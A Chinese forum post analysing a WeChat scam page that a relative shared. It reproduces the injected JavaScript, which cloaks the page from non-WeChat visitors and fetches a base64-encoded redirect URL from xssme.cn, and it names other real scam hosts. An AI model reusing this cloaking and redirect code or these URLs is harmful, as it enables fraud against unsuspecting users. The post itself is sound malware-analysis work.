分析一个微信诈骗网站

三滑稽甲苯

起因

家庭群里有人发了这个链接：

这个骗子的网站实在是太水了，标题都不改一下，年份也不核对(明明是2022才70周年好吧？)：

不说了，上机干它

初探

复制链接，电脑打开，发现重定向到了百度(百度：你礼貌吗？)，伪装微信ua也没有用
分析一下，发现它好像利用了注入漏洞，通过评论注入代码来跳转，好家伙

经过一波分析，发现xs24这个确实是关键代码

var id=24; var url='https://xssme.cn';
function GetQueryString(name) {
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
    var r = window.location.search.substr(1).match(reg);
    if (r != null) return unescape(r[2]);
    return null;
}

function isWx() {
    var platform = navigator.platform;
    var win = platform.indexOf('Win') === 0;
    var mac = platform.indexOf('Mac') === 0;
    var ua = /micromessenger/.test(navigator.userAgent.toLowerCase())
    if (ua && !win && !mac) {
        return true;
    } else {
        return false;
    }
}

function checkVersion() {
    var userAgent = navigator.userAgent.toLowerCase();
    var key = /micromessenger/;
    let res = false;
    if (key.test(userAgent)) {
        var index = userAgent.search(key);
        let version = '';
        for (var i = index + 15; i < userAgent.length; i++) {
            var item = userAgent[i];
            if (/^\d{1,}$/.test(item) || item === '.') {
                version += item;
            } else {
                break;
            }
        }
        version = parseFloat(version);
        if (version >= 7.0){
            res = true;
        }
    }
    return res;
}

function openLink(url) {
    if(window !== top) {
        top.location = url;
        return;
    }
    var label = document.createElement('a');
    label.setAttribute('rel', 'noreferrer');
    label.setAttribute('href', url);
    try {
        document.body.appendChild(label);
    } catch (e) {
        location = url;
    }
    label.click();
}

function init() {
    var queryUrl = url;
    var rmd = Math.random().toString(36).substr(2);
    var entranceUrl = `${queryUrl}/XT-${id}-${rmd}.ppt?t=${Date.now()}`;
    fetch(entranceUrl).then(response => response.text()).then(res => openLink(atob(res)));
}

if (!isWx() || !checkVersion()) {
    openLink('http://www.baidu.com');
} else {
    init();
}

这个函数的命名还是挺让人舒服的，一看就是一个有素养的程序员编写的
不多说，保存整个js下来，把isWx, checkVersion都改成return true;
Edge控制台运行，跳转到了http://y.ueicuk.abkrsc.cyou/XK-2-ecc5649e38ff2e82d7e1023e7469737487754969?_douyutv=5a817cf682e73c5b356f2803a2e3af61&ex=24 ，但是马上又到了已停止访问该网页的提示

难道已经被举报了？
手机微信打开，发现网页还在，那一定又是一个用来迷惑分析者的跳转
从请求发起程序链顺藤摸瓜，大概率就是这个k2.js了

明显有混淆，并且很长

从下面的网络请求大部分都是它发出的可看出它就是主要脚本
我不会分析这么长还混淆的脚本，那么继续看网络请求，发现一个有意思的（ppt?）

用PPT打开，发现就是一串字符，那么修改后缀名为.txt打开
熟练地翻到末尾

有“=”，盲猜base64，解密一波~

明显是json格式，然后unicode转中文

呐，数据差不多出来了，甚至还有不堪入目的小广告。。。(值得一提的是这些小广告的链接也对平台做了限制)
继续分析下去也没意思了（主要不会了），那么就反手一个举报，草率结束了吧。

再探(8-19更新)

看到这么多人回帖，我不继续下去都不好意思了
那么我们首先阻止k2.js加载然后访问网址，看看会有什么影响

主逻辑没有变，页面能够正常工作，那么这个js作用应该就是控制跳转

那么接下来分析一下“马上提现”
选中元素，查看事件侦听器的click事件，只有一个（好耶）

点进去康康，居然没有加密

简单翻译一下，它的作用是检查goshare是不是一个函数，如果是就调用，不是则提示"提现失败"并刷新。
下个断点，发现goshare的值是undefined。

goshare有两种可能的定义来源：

1. 微信内置浏览器自带
2. 前面已阻止的k2.js里定义

从简单的入手，先验证第一种猜想
写一个简单的html，上传到个人网站

微信打开并点击按钮，没有反应，那么goshare应该在k2.js里
果然在里面找到了goshare

格式化后先搜索weixin110去除跳转

运行，发现就得到了前面的base64的json数据（由于我装有idm所以自动下载了）

最后加上goshare();，得到了分享页面，就是有点乱码

点击提现按钮就是刚刚的提示

这个样本的分析就到此结束了，唯一的遗憾就是不知道它在后台做了什么，好像就是有一个请求得到了ip地址
可能就是像zuxin521所说赚取广告费吧

zuxin521

总而言之就是你帮别人点了这个链接的广告，然后别人就有了广告的推广收入，一个用户一个IP，传播出去，就更多了，有点像以前的网赚推广差不多吧

Mars1018

那个不堪入目的，我缺这点流量嘛？

miaostar

学习了，非常感谢分享！

tewboo

为研究精神点赞!

ikam

其实还是期待一直分析下去

兔子

小白  没看懂

qiaopf888

小白表示羡慕。

ongp1347

为楼主点  分析得非常好

leigdnx

期待一直分析下去

9nine

学到了，谢谢大佬